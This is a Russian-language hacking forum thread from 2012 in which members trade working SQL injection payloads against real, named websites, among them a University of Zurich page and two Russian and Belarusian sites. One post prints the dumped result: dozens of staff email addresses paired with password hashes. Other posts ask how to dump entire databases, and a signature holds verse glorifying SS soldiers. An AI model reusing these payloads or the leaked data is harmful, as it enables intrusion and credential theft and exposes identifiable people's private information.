 |
|
05.03.2012, 03:47
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от Konqi
если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.
в information_schema не хранится информация о правах, так что не ищи дальше.
Ясно, понял. Учту на будущее. Спасибо. И, безусловно, жаль, что дело принимает такой оборот. Ладно, попробуем поискать обходные пути.
|
|
|
05.03.2012, 05:59
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Konqi
если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.
Не совсем верное утверждение, бывают случаи когда доступ к базе mysql действительно запрещен но файловые привилегии тем не менее есть.
Самый верный способ узнать о наличии привилегий прочитать содержимого произвольного файла функцией load_file
|
|
|
|
05.03.2012, 06:29
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Nightmarе
Как часто такое бывает? По своему опыту назови примерный процент, интересная вещь, но стоит ли заморачиваться лишний раз с load_file
Не выводил в статистику. База Mysql это последнее дело куда я смотрю (потому что phpmyadmin не частый гость, а порт mysql чаще либо закрыт, либо лежит где-то глубоко в сети), первым делом чекаю всю лафу load_file (кстати не вижу проблем в этой фразе "стоит ли заморачиваться лишний раз с load_file", что там замарачиваться? выполнить одну команду load_file('/etc/passwd') и ежи с ним?), magic_qoutes, и пользовательские таблицы с целью поиска паролей администраторов.
|
|
|
|
06.03.2012, 11:31
|
|
Новичок
Регистрация: 13.01.2012
Сообщений: 6
С нами:
7542326
Репутация:
0
|
|
Hi friend please help me to get the datas from
column: password
table: unimitarbeiter and
DB: koopdb
vul link: http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935
injection is double query . .
|
|
|
|
06.03.2012, 11:57
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от d4rkn3ss
Hi friend please help me to get the datas from
column: password
table: unimitarbeiter and
DB: koopdb
vul link: http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935
injection is double query . .
запрос
Сообщение от None
http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935+or+1+group+by+conca t%28%28select+concat_ws%280x3a,username,passwort%2 9+from+koopdb.users+limit+0,1%29,0x00,floor%28rand %280%29*2%29%29having+min%280%29+or+1--+
результат
Сообщение от None
4.in@access.unizh.ch:f275af23c820a6339bb71aba01888 419
cgrimm@opht.unizh.ch:50125e392c292336861cba76e6fd9 45e
krystyna.siewczyk@usz.ch:cb7f36c9fd5a637ded33690f4 30e6d1c
karin.buehler@usz.ch:f5ddcab582942eb7c47e0aec63e02 3ef
c.koenig@psychologie.unizh.ch:7c6a180b36896a0a8c02 787eeafb0e4c
christine.voegtli@usz.ch:54da2d421fa1171848b6ff6fa 4bda5f0
georgina.mathis@usz.ch:0cc99d89064875ac50e317899ce 9cf4f
ursula.ludgate@usz.ch:bd8912c78ab80dc88f4c342592de 36fb
dave@ini.uzh.ch:9bff5a12ae4a501ae69018c7102c630c
diverses@peripteros.ch:f275af23c820a6339bb71aba018 88419
gabriela.brun@usz.ch:9835260c7cabe24ce31b19d327596 951
vollen@bli.uzh.ch:7e5ed010dd534b328495a5946297131d
Tristan.Weddigen@khist.uzh.ch
rolf.graf@usz.ch
madeleine.meyer@usz.ch
neuroradiologie@usz.ch:82afb9b2aff7ad5ef13e772b43b ba24f
buh@usz.ch:10eb9541ec80f146eeef0cc33a107a55
jcf@fhk.usz.ch
christine.genne@usz.ch
boeker@geo.unizh.ch
cgrimm@opht.uzh.ch:50125e392c292336861cba76e6fd945 e
curdin.conrad@usz.ch
thomas.kuendig@usz.ch:3a64e72ff183fa4f72bee32f7f67 0715
barbara.ballmer@usz.ch:8d4dffe2d67fe9fae881beb9450 8e564
peter.schmid@usz.ch
fred.buck@usz.ch:73815008e92bd1dabec64d78f8e1e7c4
damina.balmer@usz.ch:804f3cfb6443223aff6c9beafc147 f16
monique.dupuis@demed.uzh.ch
hans-dietmar.beer@usz.ch:2ee5361be26884fdfa124cccc8325a fc
michael.rufer@usz.ch:530ea1472e71035353d32d341ecf6 343
chantal.martinsoelch@usz.ch
stephan.heller@iou.unizh.ch:d5256c0fdd004a33dca56a 5da5c9ae7e
emmanuel.contassot@usz.ch:1591f96cb1a9e340096f3d1c cd8ad624
thorsten.hornemann@usz.ch:cd136e10a5fe23c2dc75d968 b528802f
danielle.hof@usz.ch:e2ea3e4af5da8abbe3ada277c6c515 21
lucia.rohrer@usz.ch
erasmus@int.uzh.ch
Doris.Varga@usz.ch :d785c99d298a4e9e6e13fe99e602ef42
arnold.vonechardstein@usz.ch
arnold.voneckardstein@usz.ch:f8ebbd7c79415208cd27c 710a2327183
m.hundt@es.uzh.ch
onur.boyman@usz.ch:dd8062ba81f193e55d388e710c3b48d 3
olga.rix@access.uzh.ch
d.rippmann@access.uzh.ch
secgruetter@bioc.uzh.ch:b0c57c22e283decb72cb882847 0f2ceb
lanja.saleh@usz.ch
lutz.wittmann@usz.ch:508e5eb303b693da58b52db10dad6 5fa
ralph.braun@usz.ch
Cecilia.Greber@usz.ch:f4742802743341c3f2ce66845586 8947
cozzio@usz.ch:ef9765fae379511732050ceede94c0e2
karin.klein@usz.ch:f5ddcab582942eb7c47e0aec63e023e f
sonja.bernhard@usz.ch:fece5e5b90990ebe62524b4f8c9f 6ba4
juerg.hafner@usz.ch
thomas.harr@usz.ch
silva.stutz@usz.ch:f3f646d7184dd50dca0553431e0fc61 1
|
|
|
|
06.03.2012, 13:27
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Как в таком запросе провести иньекцию?
Сообщение от None
SQL: SELECT * FROM `fishingc_db`.`modx_site_ec_banners` WHERE active = 1 AND (showcount <> showncount) AND (itemids LIKE '%"90'"%' OR pageids LIKE '%|219|%')
через контактацию с ошибкой не получается
http://www.fishingchel.ru/vodoemi/219?id=90%27 |
|
|
|
06.03.2012, 13:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://www.fishingchel.ru/vodoemi/219?id=90')+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
Duplicate entry '4.1.22-lk-log1' for key 1 |
|
|
|
06.03.2012, 14:02
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от faza02
Код:
http://www.fishingchel.ru/vodoemi/219?id=90')+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
Duplicate entry '4.1.22-lk-log1' for key 1 спс
а вот тут
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kudapostupat.by/speciality/id/90%27%29+or+1+group+by+concat%28table_name+from+information_schema.tables,floor%28rand%280%29*2%29%29+having+min%280%29+or+1+--+
[/COLOR][/COLOR]
чё ет за ошибка? как обходится?
Сообщение от None
SQLSTATE[HY000] [2002] Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)
|
|
|
|
06.03.2012, 15:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от qaz
спс
а вот тут
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kudapostupat.by/speciality/id/90%27%29+or+1+group+by+concat%28table_name+from+information_schema.tables,floor%28rand%280%29*2%29%29+having+min%280%29+or+1+--+
[/COLOR][/COLOR]
чё ет за ошибка? как обходится? http://kudapostupat.by/speciality/id/-90%27%29+UNION+SELECT+1,2,3,table_name,5,6,7,8,9,1 0,11,12+from+information_schema.tables%23
=\
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
06.03.2012, 20:48
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
А чё ето за байду мне выдаёт?
Сообщение от None
Fatal error: Allowed memory size of 201326592 bytes exhausted (tried to allocate 3440 bytes) in /home/kudapost/public_html/library/Zend/Db/Statement/Pdo.php on line 290
Сообщение от None
http://kudapostupat.by/speciality/id/-90%27%29+limit+0,0+UNION+SELECT+1,2,3,user_email,5 ,6,7,8,9,10,11,12+from+kp_users--+
как базу выкачать? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
